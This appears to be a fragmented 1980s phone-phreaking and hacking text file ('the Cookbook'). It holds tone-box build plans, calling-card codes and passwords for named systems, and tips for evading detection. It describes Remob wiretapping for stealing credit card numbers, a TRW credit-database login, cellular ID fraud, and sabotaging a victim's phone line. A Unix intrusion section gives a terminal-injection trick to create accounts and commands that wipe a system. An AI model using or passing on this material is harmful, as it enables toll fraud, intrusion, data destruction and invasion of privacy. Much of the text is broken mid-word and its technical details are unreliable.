9-Volt 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1.....Single turn, 50k potentio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2.....  "     "    100k potentio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3.....  "     "    500k potentio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4.....  "     "    1meg potentio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KR...Standard 8-ohm spea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Mini transformer (8-ohm wo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sc...Wire, solder, soldering iron, P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ard or perfboard, box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tain the completed u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ttery cli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ructions for building Pearl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the instruction are EXTREMELY difficult to explain in words, you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iven a schematic instead. It will be quite difficult to follow but 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any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hematic for The Pearl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1            C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T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  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Q1                   !   +-S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e-----S2---+       !    SPK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1   R2   R3   R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hat you are probably thoroughly confused, let me explain a f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or details. The potentiometer area is rigged so that the left pol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ed to the center pole of the potentiometer next to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iddle terminal of T1 is connected to the piece of wire that runs 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end of the batte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rect operation of The Pearl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want to get some dry-transfer decals at Radio Shack to make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b a lot easier. Also, some knobs for the tops of the potentiome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be useful too. Use the decals to calibrate the knobs. R1 is the kno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ones place, R2 is for the tens place, R3 if for the hundr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ce and R4 is for the thousands place. S1 is for producing the a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nes and S2 is for po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1: Turn on the power and adjust the knobs for the desired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ample: For 2600 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1=0:R2=0:R3=6:R4=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ep 2: Hit the pushbutton switch and VIOLA! You have the tone.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n't have a tone recheck all connections and schemat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reak file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02 282 3010 UNIV. OF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02 553 0229 PENTAGON T.A.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2 635 5710 CATHOLIC UNIV. OF AMER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02 893 0330 DEFENSE DATA NET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02 893 0331 DEFENSE DATA NET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02 965 2900 WATERG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03 771 4930 TELEPHONE PIONE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06 641 2381 VOICE OF CHE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2 526 1111 NEW YORK FEED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2 557 4455 SEX HOT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2 799 5017 ABC NY FEED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2 934 9090 DIAL-AN-IDI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2 976 2727 P.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2 986 1660 STOCK QUO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3 541 2462 STOCK MARKET REP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3 547 6801 NAVY SHIPS INF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3 576 6061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3 664 3321 NEWS FOR THE BL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01 393 1000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01 667 4280 LOTTERY INF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12 939 1600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04 221 5519 NUCLEAR COMMI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08 248 8818 1ST NAT'L BA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15 642 2160 EARTHQUAKE REPC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05 883 6828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12 472 2181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12 472 4263 WIERD RECOR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12 472 9833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12 472 9941 INSERT 25 C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12 472 9941 SPECIAL RECOR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12 870 2345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16 794 1707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19 748 0002 LOOP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19 748 0003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03 331 0057 MCI           (5 DIG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03 334 6831 WASH. PO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3 354 8723 COMPEL I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03 737 2051 METROPHONE    (6 DIG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03 835 0500 VALNET        (5 DIG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03 861 7000 SPRINT      (6/8 DIG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03 861 9181 SPRINT      (6/8 DIG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14 974 4020 CA. MAINFR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16 475 1072 N.Y. DEC-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222 0555 RESEARCH INSTIT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 223 3312 CITIBA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227 5576 EASTERN AIRLI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248 0151 WHITE HOUSE P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321 1424 FLIGHT PLA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323 3026 TEL-TEC       (6 GIG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323 4756 MOTOROLA DIT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323 7751 M.C.I. MAINFR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325 4112 EAsYL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325 6397 F.Y.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344 4000 MSG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368 6900 SKYLINE ORDE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424 9090 RONALD REAGAN'S P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424 9096 WHITE HOUSE SW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438 9428 ITT CITY CALL SWITC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521 2255 AUTO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521 8400 TRAVELNET     (8 DIG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526 3714 RCA MAINFR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527 1800 TYM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621 3026 SPECIAL OPERA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621 3028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621 3030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621 3035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631 1146 VOICE ST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821 2121 BELL TELEMARKE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828 6321 XERO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858 9313 RECORD-A-V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00 882 1061 AT&amp;T STOCK PRI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914 997 1277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916 445 2864 JERRY BR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 950 1000 SPR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 950 1022 MCI EXECU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 950 1033 US TELE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 950 1044 ALLNET        (6 DIG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 950 1066 LEXIT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 950 1088 SKYLINE       (6 DIGI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       | DESCRIPTION/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1-643-2227  | CODES:235199,23502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ND 12127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5-4112  | WESTERN UN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47-1784  | CODES:101111,35000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ND 35000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424-9098  | TOLL FREE WHITE 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424-9099  | DEFENSE HOT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2-965-2900  | WATERG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68-5693  | HOWARD BAKER HOTL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2-456-7639  | REAGANS SECRET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02-545-6706  | PENTAG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2-694-0004  | PENTAGON MOD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1-932-3371  | RUTG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5-2091  | PASSWORD: GA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228-1111  | AMERICAN EXP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17-258-8313  | AFTER CONN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PRESS CTRL-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3-7751  | PASSWORD:REG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2-1415  | CODES:266891,41126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ND 83656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USED BY SYS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800 #'s have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lected however no codes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n found yet! if you hack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let me k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one #         | co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1-334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3-302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3-320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3-320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5-7222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7-9895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7-9136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43-184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47-178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47-675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654-849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682-400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858-900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 #'s with carri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3-9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3-906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3-907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1-46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47-178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 numbers of the gover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1-1082:NAVY FINANCE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424-5201:EXPORT IMPORT BA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23-0677:ALCOHOL TOBACCO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32-1556:FED INFORMATION CNTR1-1082:NAVY FINANCE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424-5201:EXPORT IMPORT BA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23-0677:ALCOHOL TOBACCO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32-1556:FED INFORMATION CNT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5-4072:COMBAT &amp; ARMS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5-4095:COMBAT SUPPORT BRAN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5-4890:ROPD USAR COMBAT AR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432-3960:SOCIAL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426-5996:PUGET NAVAL SHIPY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y of toll free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432-3960:SOCIAL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426-5996:PUGET NAVAL SHIPY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y of toll free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1-234-0100:BALTIMORE ELECTR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2-456-1414:WHITE H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2-545-6706:PENTAG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2-343-1100:EP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4-891-1267:DIAL-A-GEE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4-897-5511:TIM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571-6523:SATANIC MESSA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664-7664:DIAL-A-S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5-843-7396:SYNTHACER MUS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765-1000:LIST OF MANY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2-472-4263:WIE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2-472-9941:INSERT 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3-771-3930:PIONE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254-4914:DIAL-A-ATHI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2-586-0897:DIR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840-3971:HOROWIE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3-771-3930:PIONE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71-9420,345-9721,836-896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36-3298,323-4139,836-569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71-9440,471-9440,471-695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76-6040,327-9772,471-94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5-1693,800-325-41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21-8400:VOICE ACTIV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992-8282:METROFONE ACCESS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17-738-5051:PIRATE HARB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17-720-3600:TIMECOR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1-344-9156:N.A.S.A PASSWORD:GA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8-233-6289:UNIVERSITY LOUISIAN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822-2112:213-822-335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822-1924:213-822 312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449-4040:TECH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937-3580:TELE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842-878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368-567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345-387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2-331-143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892-72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626-24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3-237-182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3-224-609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3-225-105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3-224-941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18-992-828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521-84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entering the sprint code,and, C+Destination number.Then enter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205#977#22",And the main tracer for sprint will be disab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5-561-3199/SPRINT LONG DI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2-456-1414/WHITE H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11-441-930-4832/QUEEN ELIZABE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16-445-2864/JERRY BR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424-9090/RONALD REAGAN'S P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2-799-5017/ABC NEW YORK FEED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882-1061/AT &amp; T STOCK PR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2-986-1660/STOCK QU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935-1111/WIERD EFFEC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2-472-4263/WIERD RECO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2-976-2727/P.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19-748-0002/FONE CO. TESTING L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00-410-6272/SPACE SHUTTLE CO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1-221-6397/AMERICAN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5-466-6680/BELL OF PENNSYLVAN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2-347-0999/CHESAPEAKE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829-0111/GENERAL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8-533-4426/HAWAIIAN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2-368-8000/ILLINOIS BELL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7-265-8611/INDIANA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3-223-7233/MICHIGAN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3-223-7223/NEVADA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7-955-1111/NEW ENGLAND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1-483-3800/NEW JERSEY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2-395-2200/NEW YORK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5-243-0890/NORTHWESTERN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6-822-6980/OHIO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6-345-2900/PACIFIC NORTHWEST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621-4141/PACIFIC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5-321-2222/SOUTH CENTRAL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4-391-2490/SOUTHERN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3-771-4920/SOUTHERN NEW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4-247-5511/SOUTHWESTERN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4-678-3511/WISCONSIN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7-6713/UNKNOWN ORI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3-232-8555/HP3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5-423-1313/DEC-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3-577-0260/WAYNE ST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2-474-5011/AUSTIN COMPU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6-567-8013/LYRICS TIMESHA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2-369-5114/RST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5-327-5220/NE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3-795-1200/SHELL COMPU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8-471-8111/CNA OF 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7-6761/AUTO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228-1111/VISA CREDIT CHE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3-483-2700/NASU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383-1115/COSMO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8-280-1901/TR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4-885-3460/SEARS CREDIT CHE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4-289-9988/AARDVARK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19-852-1482/ANDROMEDA INCORPOR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985-2922/ARTSC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4-627-9887/ASTAR INTERNA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5-964-8021/AUTOMATED SIMUL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3-345-3043/AVANT GARDE CRE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5-456-6424/BRODERBUND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5-658-8141/BUDGE COMP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4-755-5392/CAVALIER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1-753-6990/COMPUTER DATA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701-5161/DATASOFT I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366-7160/DATAM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6-442-8960/DYNACOM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346-6783/EDU-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631-0856/HAYD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19-983-1990/MED SYSTEMS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2-433-7550/MICRO LA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6-454-1315/MICROSO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1-659-7212/MUSE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9-683-6858/ON-LINE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3-661-8799/PROGRAM DESIGN (PD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3-344-6599/QUALITY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3-925-9293/SENTIENT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2-647-2673/SIERRA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16-920-1939/SIRIUS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5-393-2640/SIR-TE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5-962-8911/SOFTWARE PUBLISH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5-964-1353/STRATEGIC SIMUL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7-359-8482/SUBLOGIC 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6-226-3216/SYNERGISTIC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a few tips on how not to get caught when using MCI or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h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Try not to use them for voice to voice personal calls. Try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m for computer calls only. Here is wh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CI and those other services can't really trace the call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me through the lines,they can just monitor them. They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sten in on your calls and from that,they can get your nam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ther information from the conversation. They can also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number you called and ask your friend some questions.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call terminals and BBS'S then it is much harder to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formation. For one thing,most sysops won't give these du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at call any info at all or they will act dumb because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EAK themsel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Beware when using colored boxes! They are easy to f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ry to find a sine-wave number. Then use an MCI or other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call it. You will hear a tone that goes higher and lower.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tone just stops,then that code is being monitored and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hould beware when using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you do get caught,then if you think you can,try to weasel out of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have heard many stories about people that have pleaded with the MC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uys and have been let off. You will get a call from a guy that has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itoring you. Act nice. Act like you know it is now wrong to do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nd of thing.....just sound like you are sorry for what you did.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a call,you probably will be a little sor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wise,it is very dangerous!!!!!!! (Very with a capital V!)</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Box Pla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boxing is simulating the tones produced by public payphones when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op your money in. The tones are beeps of 2200 Hz + 1700 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ckle = 1 beep for 66 milliseco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me = 2 beeps, each 66 milliseconds with a 66 millisecond pause betw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rter = 5 beeps, each 33 milliseconds with a 33 millisec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use between bee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two commonly used methods being used by Phreaks to make free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An electronic hand-held device that is made from a pair of Wien-brid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scillators with the timing controlled by 555 timing chi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 tape recording of the tones produced by a home computer. On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est computers to use would be an Atari ST. It is one of the eas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s to use because the red box tones can be produced in basic with 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5 stat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RemObS_________________________]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of you may have heard of devices called Remobs which st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Remote Observation System. These Devices allow supposed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horized telephone employees to dial into them from anywher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using an ordinary touch tone fone, tap into a customer's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special receive only mode. [The mouthpiece circu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ctivated, allowing totally silent observation from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e in the world (Wire tapping without a court order is again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a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How Remobs Work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the number of a Remob unit.  Bell is rumored to put them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55 information exchanges, oron special access trun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reachable except via blue box].  A tone will then be he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pproximately 2 seconds and then silence.  You must key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DTMF) a 2 to 5 digit access code while holding each digit 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least 1 second.  If the code is not entered within 5 or 6 seco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mob will release and must be dialed again.  If the cod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posedly another tone will be heard.  A seven digit subscri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e number can then be entered [The Remob can only handle cer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hanges' which are prewired, so usually one machine can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itor an entire NPA].  The Remob will then connect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cribers line.  The listener will hear the low level idle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the monitored party is on hook.  As the monitored par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s [rotary or DTMF], the listener would hear [And Rec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umber being dialed.  Then the ENTIRE conversation, datali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ever is taking place,  all without detection.  There is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rent box which can detect Remob observation, since it is being d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telephone equipment that makes the connection.  Whe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er is finished monitoring of that particular customer,  he ke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ast digit of the access code to disconnects him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itored line and return to the tone so that he can key in an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digit fone #.  When the listener is totally finished with the Remo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eys a single 'disconnect digit' which disconnects him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b so that the device can reset and be ready for another cal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History of Remobs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ll has kept the existance of Remobs very low key.  Only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974, Bell acknowledged that Remobs existed.  The device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made public during hearings on "Telephone Monitoring Pract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Federal Agencies" before a subcommittee on govern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ions.  House of Representatives, Ninety-Third Congress,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97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has since been stated by Bell that the Remob dev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used exclusively for monitoring Bell employees such as opera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operators, etc., to keep tabs on their perform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uureee, were stup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Possible Uses for Remobs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ossible uses of Remobs are almost as endless as the u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self created fone line.  Imagine the ability to monitor bank l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c, just off the top of my head I can think of these applic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ta Monitoring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ional Credit Burea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amp;T Cosmo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nk Institu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serve and other Netwo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oice Monitoring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nk Institu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Order buisne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 Telephone themsel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place handling sensitive or important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one that you may not li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just one Remob, someone could get hundreds of credit ca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d out who was on vacation, get compuserve passwords by the doze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onnect peoples fones, do credit checks, find out about an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y may want to find out about.  Im sure you brilli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see the value of a telephone hobbiest and a telecommuni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husist getting his hands on a few choice Remobs. &lt;Gri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Caution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any reader should discover a Remob during his (or her) scan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ursions,  please keep in mind the very strict federal la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arding wiretapping and unauthorized use of private Bell proper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let Box Pla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urpose of a Scarlet box is to create a very bad con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can be used to crash a BBS or just make life miserable for thos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k to ave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2 alligator clips, 3 inch wire, or a re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in wire will create greatest amount of stat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sister will decrease the amount of static in porportion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sister you are u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1): Find the phone box at your victims house, and pop the cover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2): Find the two prongs that the phone line you wish to box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3): Hook your alligator clips to your (wire/re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4): Find the lower middle prong and take off all wires connect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 think this disables the ground and call waiting and shit lik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5): Now take one of the alligator clips and attach it to the up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prong, and take the other and attach it to the lower middle pr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 (6): Now put the cover back on the box and take o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pro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ire/re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me phone bullsh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Box Pla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irst a bit of Phone Trivia. A standard telephone keypad has 12 butt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buttons, when pushed, produce a combination of two tones. These t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resent the row and column of the button you are pus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1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3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   3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   6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697   (1) (2)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70   (4) (5)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51   (7) (8)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41   (*)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1) produces a tone of 697+1209, (2) produces a tone of 697+1336,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at the Silver Box does is just creates another column of butt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new tone of 1633. These buttons are called A, B, C, and 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fuln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yone who knows anything about phreaking should know that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ld days of phreaking, phreaks used hardware to have fun instead of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s Sprint and MCI codes. The most famous (and useful) was the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l' Blue Box. However, Ma Bell decided to fight back and now most phone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protections against tone-emitting boxes. This makes boxing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futile in most areas of the United States (ie those areas with Crossb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tep-By-Step). If you live in or near a good-sized city, then your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is probably up-to-date (ESS) and this box (and most oth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e useless. However, if you live in the middle of nowhere (no off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nded), you may find a use for this and other box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Foot of Blue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Foot of Grey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Foot of Brown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Small SPDT Sw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Standard Ma Bell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PDT = Single Pole/Double Thr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Soldering Ir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Flat-Tip Screwdri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Loosen the two screws on the bottom of the phone and take the casinf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Loosen the screws on the side of the keypad and remove the keypad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unting brack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Remove the plastic cover from the keyp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Turn the keypad so that *0# is facing you. Turn the keypad over. You'll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bunch of wires, contacts, two Black Coils,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Look at the Coil on the left. It will have five (5) Solder Contac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cing you. Solder the Grey Wire to the fourth Contact Pole from the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Solder the other end of the Grey Wire to the Left Pole of the SPDT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Find the Three (3) Gold-Plated Contacts on the bottom edge of the keyp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Left Contact, gently seperate the two touching Connectors (they'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dered together) and spread them ap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 Solder the Brown Wire to the Contact farthest from you, and sold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end to the Right Pole of the SPDT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 Solder the Blue Wire to the Closest Contact, and the other end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er Pole of the SPDT Switch.¢¢(10) Put the phone back toge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The Silver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at you have just done was installed a switch that will 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369# column into an ABCD column. For example, to dial a 'B',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ilver Box Tones and hit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one is sure of the A, B, and C uses. However, in an area with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ld phone system, the 'D' button has an interesting effect. Dial Direc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istance and hold down 'D'. The phone will ring, and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get a pulsing tone. If you get a pissed-off operator, you hav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er phone system with defenses against Silver Bo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pulsing tone, dial a 6 or 7. These are loop e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 Trashing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hone Co. will go to extreams on occasions. In fact, unl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really know what to expect from them, they will suprise the he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 with their "unpublished tarriffs". Recently, a situ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brought to my attention that up till then I had been tota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aware of, least to mention, had any concern about. It involved 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ge! The phone co. will go as far as to prosecute anyone who ruma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ir garbage and helps himself to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course, they have their reasons for this, and no doubt benef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such action. But, why should they be so picky about garbag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swer soon became clear to me: those huge metal bins are filled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more than waste old food and refuse... Although it is Pacif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 policy to recycle paper waste products, sometimes employees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look this sacred operation when sorting the garbage.  Th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secret confidential Phone Co. records go to the garbage b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ead of the paper shredders. Since it is constantly being upd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company memorandums, and supplied with extensive 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the Phone co. must continualy dispose of the outd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Some phone companies are supplied each year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lete "System Practices" guide. This publication is an over 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ot long library of reference material about everything to do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s. As the new edition arrives each year, the old version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Practices" must also be thrown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very quickly figured out where some local phone phreaks w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their material. They crawl into the garbage bins and remo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ed items that are of particular interest to them and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llow phreaks. One phone phreak in the Los Angeles area has salvag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mplete 1972 edition of "Bell System Practices". It is so l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as out of order (the binders had been removed) that it took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a year to sort it out and create enough shelving for it in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r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uch of this "Top Secret" information is so secret that most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ies have no idea what is in their files. They have their h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 simply replacing everything each time a change in wo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ires a new revision. It seems they waste more paper than they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took quite a while for Hollywood Cal traffic manager to fig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how all of the local phone phreaks constantly discovere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room test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enever someone wanted to use the testboard, they found the lo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phreaks on the lines talking to all points all over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t to the point where the local garbage buffs knew more abo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operations than the employees themselves. One phreak went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r as to call in and tell a switchman what his next daily assign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be. This, however, proved to be too much. The switch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ed the call and one phone phreak was denied the tool of his tr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another rather humorous incident, a fellow phreak was rumag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trash bin when he heard somone apraoching. He pressed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ainst the side of the bin and silently waited for the goodie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You can imagine his surprise when the garbage from the lunchro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nded on his head. Most people find evenings best for checking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r local telco trash piles. The only thing necessary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shlight and, in the case mentioned above, possibly a rain coa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of warning though, before you rush out and dive into the tra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p. It is probably illegal, but no matter where you liv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ainly won't get the local policeman to hold your flashlight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adian WATS Phonebook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227-4004 ROLM Collagen Cor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227-8933 ROLM Collagen Cor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268-4500 Voic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268-4501 ROLM Texa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268-4505 Voic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268-6364 National Data Cred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268-7800 Voic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268-7808 Voic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28-9632 Voic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2097 Voic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2098 Voic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8803 ROLM Canadian T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8861 ROLM Canadian T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8862 ROLM Canadian T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8863 ROLM Canadian T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8864 ROLM Canadian T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8870 ROLM Halifax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8871 ROLM Halifax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9115 ASPEN Sunswee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9116 ASPEN Sunswee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9175 PBX [Hold Music=CHUM F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9218 Voice Messen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387-9644 Carr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426-2638 Carr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524-2133 Asp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663-5000 PBX/Voice Mail [Hold Music=CFMI F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663-5996 Voice Mail (5 r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847-6181 Voice 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Each and every one of these numbers is available to the 60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tish Columbia) Area Code.  Most are available Canada Wide and s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located in the United States.  Numbers designated ROLM have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entified as being connected to a ROLM Phonemail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designated ASPEN are connected to an ASPEN voice message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designated VOICE MAIL have not been identified as to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use on that line.  Numbers designated carrier are answered by a mod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data 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Voice Message systems, and ALL Rolms, sound like an answering mach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s 0 during the recording when in a rolm, * or # or other DTMF in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and be propelled into another wor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ought to you in the Cookbook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TRW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en you call TRW, the dial up will identify itself with the message "TR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ill then wait for you to type the appropiate answer back (such as CTRL-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This has been done, the system will say "CIRCUIT BUILDING IN PROG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ong with a few numbers. After this, it clears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TRL  L) followed by a CTRL-Q. After the system sends the CTRL-Q,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y for the request. You first type the 4 character identifyer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graphical area of the accou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Example) TCA1 - for certain Calif. &amp; Vicinity subscrib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CA2 - A second CALF. TRW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NJ1 - Their NJ Datab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GA1 - Their Georgia Datab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ser then types A &lt;CR&gt; and then on the next line, he must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3 char. Option. Most Requests use the RTS op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X, RTX, and a few others exist. (NOTE) TRW will accept an A, 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 as the 'X' in the options above.) Then finally, the user types his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it subscriber code. He appends his 3-4 character password after i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ms that if you manage to get hold of a TRW Printout (Trashing at Sea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ks, ETC. or from getting your credit printout from them) Their subscri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 will be on it leaving only a 3-4 character p/w up to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the Dial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W  System Types, ST) CTRL-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type,YT) Circuit building in progress 123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 CTRL-L CRTL-Q (TCA1 CYT) BTS 3000000AA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R&gt;&lt;CRTL-S&gt; (Y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is sytem is in Half Duplex, Even Parity, 7 Bits per wor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Stop B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TION: It is a very stressed rumor that after typing in the TR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word Three (3) times.. It sets an Automatic Number Identification on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 so be careful. And  forget who told you how to do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Vax's &amp; Unix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nix is a trademark of At&amp;t (and you know what that mea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article, we discuss the unix system that run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arious vax systems.  If you are on another unix-type system,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s may differ, but since it is licenced to bell, they can't make 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onto a unix system is very difficult, and in this case, we advi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an inside source, if possible. The reason it is difficult to hack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x is this:  Many vax, after you get a carrier from them, respon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give you no chance to see what the login name format is.  Most comm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are single words, under 8 digits, usually the person's name.  Ther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way around this:  Most vax have an acct. called 'suggest' for peopl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o make a suggestion to the system root terminal.  This is usually watch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system operator, but at late he is probably at home sleeping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ewing someone's brains out.  So we can write a program to send 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x this type of a mes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creen freeze (Cntrl-s), screen clear (system dependant), about 2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rbage characters, and then a command to create a login acct., after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ear the screen again, then unfreeze the terminal.  What this d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terminal is frozen, it keeps a buffer of what is sent.  we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ffer is about 127 characters long. so you overflow it with trash, and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end a command line to create an acct. (System dependant).  after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ear the buffer and screen again, then unfreeze the terminal.  Thi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bad way to do it, and it is much nicer if you just send a comman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erminal to shut the system down, or whatever you are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lways, *Always* an acct. called root, the most powerful ac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e on, since it has all of the system files on it.  If you hack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onto this one, then everything is easy from here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unix system, the abort key is the Cntrl-d key.  watch how many ti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it this, since it is also a way to log off the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ittle about unix architechture: The root directory, called roo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he system resides.  After this come a few 'sub' root directo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ually to group things (stats here, priv stuff here, the user lo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 this comes the superuser (the operator of the system), and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ally the normal users.  In the unix 'Shell' everything is treated the s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is we mean:  You can access a program the same way you access a us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y, and so on.  The way the unix system was written, ever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included, are just programs belonging to the root directory.  Th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you who hacked onto the root, smile, since you can screw ever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ain level (exec level) prompt on the unix system is the $, and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on the root, you have a # (superuser pro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 a few basics for the system... To see where you are, and what pat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active in regards to your user account, then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pw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hows your acct. seperated by a slash with another pathname (ac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sibly many times. To connect through to another pa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many paths, you would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path1/path2/path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you are connected all the way from path1 to path3.  You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n the programs on all the paths you are connected to.  If it d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allow you to connect to a path, then you have insufficient privs,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ath is closed and archived onto tape.  You can run programs this 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gt; path1/path2/path3/program-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x treats everything as a program, and thus there a few command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e what you have access to in the end path, typ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list.  this show the programs you can run.  You can connec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oot directory and run it's programs wi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way, most unix systems have their log file on the root, so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set up a watch on the file, waiting for people to log in and snatch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word as it passes thru the file. To connect to a directory, u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cd pathname  This allows you to do what you w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at directory.  You may be asked for a password, but this is a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y of finding other user names to hack o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ildcard character in unix, if you want to search down a path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game or such, i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show you what you can access. The file types are the same as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on a dec, so refer to that section when examining file.  To see wha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file, u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p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name command, for print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dvise playing with pathnames to get the hang of the concept.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on-line help available on most systems with a 'help' o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dvise you look thru the help files and pay attention to an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give you on pathnames, or the commands for the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s a user, create or destroy directories on the tree beneath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eans that root can kill everything but root, and you can kill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are below you.  These ar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mkdir path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rmdir path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ce again, you are not alone on the system... typ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e what other users are logged in to the system at the time.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t to talk to th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rite user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allow you to chat at the same time, without having to wor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the parser.  To send mail to a user,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enter the mail sub-system. To send a message to all the u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ystem,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w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stands for 'write all'. By the way, on a few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you have to do is hit the &lt;return&gt; key to end the mes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on others you must hit the cntrl-d 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nd a single message to a user,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write user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very handy again!  If you send the sequence of characters discus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very beginning of this article, you can have the super-user terminal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icks for you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v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superuser privs, you can either log in as root, or edit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t. so it can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s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now gives you the # prompt, and allows you to completely by-pas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ion.  The wonderful security conscious developers at bell mad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y difficult to do much without privs, but once you have them,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absolutely nothing stopping you from doing anything you wan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ring down a unix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chdir /b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ipes out the pathname bin, where all the system maintenance fil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r -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recursively removes everything from the system except the remo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 it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kill -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sy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ipes out the system devices from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are finally sick and tired from hacking on the vax systems,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your cntrl-d and repeat key, and you will eventually be logged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ason this file seems to be very sketchy is the fact that bell has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cenced versions of unix out in the public domain, and these command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se common to all of them.  I recommend you hack onto the root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n directory, since they have the highest levels of privs, and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really not much you can do (except develop software) without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ification Circuits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iginally an Apple ][ file so forgive the upper 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ONE BUSY VERIFICATION CONFERENCE CIRCUIT IS ALWAYS PROVIDED.THE CIRCUIT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EE-WAY CONFERENCE BRIDGE THAT ENABLES AN OPERERATOR TO  VERIFY THE BUSY/I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ITION OF A SUBSCRIBER LINE.UPON REQUEST OF A PARTY ATTEMPTING TO REAC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ED DIRECTORY NUMBER, THE OPERATOR DIALS THE CALLED LINE NUMB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RMINE IF THE LINE IS IN USE,IF THE RECEIVER IS OFF THE HOOK,OR IF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IN LOCKOUT DUE TO A FAULT CONDITKON.THE OPERATOR THEN RETURNS TO THE PAR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ING TO REACH THE DIRE CTORY NUMBER AND STATES THE CONDITION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LINES WITH DATA SECURITY CAN NOT BE ACCESSED FOR BUSY VERIFICATION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NE IS IN USE.(REFER ALSO TO DATA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THREE PORTS ARE ASSIGNED TO EACH BUSY VERIFICATION CONFERENCE CIRCUI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 IS FOR OPERATOR ACCESS AND TWO PORTS ARE USED TO SPLIT AN EXI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ON.TO VERKFY THE BUSY/IDLE CONDITION OF A LINE,TH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TABLISHED A CONNECTION TO THE OPERATOR ACCESS PORT AND DIALS THE DIREC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OF THE LINE TO BE VERIFIED.IF THE LINE IS IN USE,THE EXI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ON IS BROKEN AND IMMEDIATLY RE-ESTABLISHED THROUG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TWO PORTS OF THE BUSY VERIFICATION CIRCUIT WITHOUT INTERRUP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Y VERIFICATION CIRCUIT IS CONTROLLED BY ACCESS CODE. A DEDICATED TRUNK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USED BUT IS NOT NECESS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THE BUSY VREIFICATION CIRCUIT ALSO CAN BE USED FOR TEST VERIFY FROM THE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IEFS TEST PAN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ADDITIONAL BUSY VERIFICATION CONFERENCE CIRCUITS (00274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 THERE IT IS-RIGHT OUT OF AN ESS MANUAL WORD FOR WORD! (AND IM GETTING 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AR FEET OF ESS MANUALS!!! NOT COUNTING THE STACK RECEIVED SO F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ought to you in the Cookbook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Box Pla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White Box is simply a portable Touch-Tone keypad. For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on Touch-Tone, see my Silver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Touch-Tone Keyp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Miniature 1000 to 8 Ohm Transfor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adio Shack # 273-13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Standard 8 Ohm Spea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9V Batte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9V Battery Cli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Connect the Red Wire from the Transformer to either terminal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Connect the White Wire from the Transformer to the other terminal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pea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Connect the Red Wire from one Battery Clip to the Black Wire from the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ttery Cl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Connect the Red Wire from the second Battery Clip to the Green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e Keyp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Connect the Blue Wire from the Keypad to the Orange/Black Wire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Keyp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Connect the Black Wire from the first Battery Clip to the two abo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res (Blue and Black/Or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Connect the Black Wire from the Keypad to the Blue Wire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or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 Connect the Red/Green Wire from the Keypad to the Green Wire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or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 Make sure the Black Wire from the Transformer and the remaining wi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e Keypad are f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 Hook up the Batte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Put it all in a c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dd a Silver Box to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use it like a normal keypad, except put the speaker next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iver of the phone you're u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LAST Box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 want to really make yourself be heard? Ever talk to someone on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 just doesn't shut up? Or just call the operator and pop her eardrum?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until recently it has been impossible for you to do these things. Tha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of course you've got a blast box. All a blast box is, is a really che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ifier, (around 5 watts or so) connected in place of the microphone on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It works best on model 500 AT&amp;T Phones, and if constructed sm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can be placed inside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tr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truction is not really important. Well it is, but since I'm letting you m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own amp, I really don't have to includ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you've built your blast box, simply connect a microphone (or u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phone from the phone) to the input of the amplifier, and presto. Ther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Now, believe it or not, this device actually works. (At least on crossb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seems that Illinois bell switching systems allow quite alot of curren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 right through the switching office, and out to whoever you're calling.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lk in the phone, it comes out of the other phone (again it works best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one that you're calling has the standard western electric earpie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redibly loud. This device is especially good for PBS Subscription dri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Phun", and don't get cau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ealing with the Rate &amp; Route Operat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seems that fewer and fewer people have blue bo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days, and that is really too bad.  Blue boxes, while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at great for making free calls (since the TPC can tell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ll was made, as well as where it was too and from),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lly a lot of fun to play with.  Short of becoming a real l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SPS operator, they are about the only way you can really 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ne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 the few of you with blue boxes, here are some phr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may make life easier when dealing with the rate &amp; ro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mp;R) operators.  To get the R&amp;R op, you send a KP + 141 + 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some areas you may need to put another NPA before the 14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 KP + 213 + 141 + ST), if you have no local R&amp;R o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R&amp;R operator has a myriad of information, and all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s to get this data is mumbling cryptic phrases.  There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ally four special phrases to give the R&amp;R ops.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route, DIRECTORY route, OPERATOR route, and PLACE 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get an R&amp;R an area code for a city, one can ca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mp;R operator and ask for the numbers route.  For example, to f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rea code for Carson City, Nevada, we'd ask the R&amp;R op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son City, Nevada, numbers route, please." and get the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702 plus." meaning that 702 plus 7 digits gets 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metimes directory assistance isn't just NPA + 131.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to get these routings is to call R&amp;R and ask for "Anahe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ifornia, directory route, please." Of course, she'd tell us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714 plus, which means 714 + 131 gets us the D.A. op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sort of pointless example, but I couldn't come up wit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ter one on short not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s say you wanted to find out how to get to the inw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for Sacremento, California.  The first six digits o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in that city will be required (the NPA and an NXX).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 let us use 916 756. We would call R&amp;R, and whe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answered, say, "916 756, operator route, plea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would say, "916 plus 001 plus."  This means that 9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001 + 121 will get you the inward operator for Sacramento.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the city which corresponds to 503 640?  The R&amp;R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es, and will tell you that it is Hillsboro, Oregon,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eetly ask for "Place name, 503 640, ple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 example, let's say you need the directory route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veg, Sweden. Simply call R&amp;R, and ask for, "Interna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den, Switzerland. TSPS directory route, please."  In respo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is, you'd get, "Right... Directory to Sveg, Sweden.  Coun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 46 plus 1170."  So you'd route yourself to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sender, and send 46 + 1170 to get the D.A.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Swed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ward operator routings to various countri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btained the same way "International, London, England, TS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ward route, please." and get "Country code 44 plus 12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fore, 44 plus 121 gets you inward for Lond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wards can get you language assitance if you don't sp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anguage. Tell the foreign inward, "United Staes cal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nguage assitance in completing a call to (called party)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ed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amp;R operators are people are people too, y'know.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ways be polite, make sure use of 'em, and dial with c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llular Phreaking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cellular/mobile phone system is one that is perfectly set up t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oited by phreaks with the proper knowledge and equipment.  Thank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regulation, the regional BOC's (Bell Operating Companies) are scatte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do not communicate much with each other.  Phreaks can take advantag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by pretending to be mobile phone customers whose "home base" is a c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ed by a different BOC, known as a "roamer".  Since it is impracti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ach BOC to keep track of the customers of all the other BOC's,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usually allow the customer to make the calls he wishes, often wit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charge of some s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ill is then forwarded to the roamer's home BOC for coll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 it is fairly simple (with the correct tools) to create a bogus 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for your mobile phone, and pretend to be a roamer from some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ty and state, that's "just visiting".  When your BOC tries to collect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lls from your alleged "home BOC", they will discover you are no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l customer; but by then, you can create an entirely new electron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entity, and use that inst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 does the cellular system know who is calling, and where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a mobile phone enters a cell's area of transmission, it transmits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number and its 8 digit ID number to that cell, who will keep track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until it gets far enough away that the sound quality is sufficien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minished, and then the phone is "handed off" to the cell that the custo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s walked or driven into.  This process continues as long as the phone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wer and is turned on.  If the phone is turned off (or the car is), some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empting to call the mobile phone will receive a recording alo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s of "The mobile phone customer you have dialed has left the vehic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driven out of the service area."   When a call is made to a mobil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witching equipment will check to see if the mobile phone being called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ged in", so to speak, or present in one of the cells.  If it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will then act (to the speaking parties) just like a normal call -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er may hear a busy tone, the phone may just ring, or the call may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sw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 does the switching equipment know whether or not a particul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is authorized to use the network?  Many times, it doesn't.  Whe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ler installs a mobile phone, he gives the phone's ID number (an 8 dig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xadecimal number) to the local BOC, as 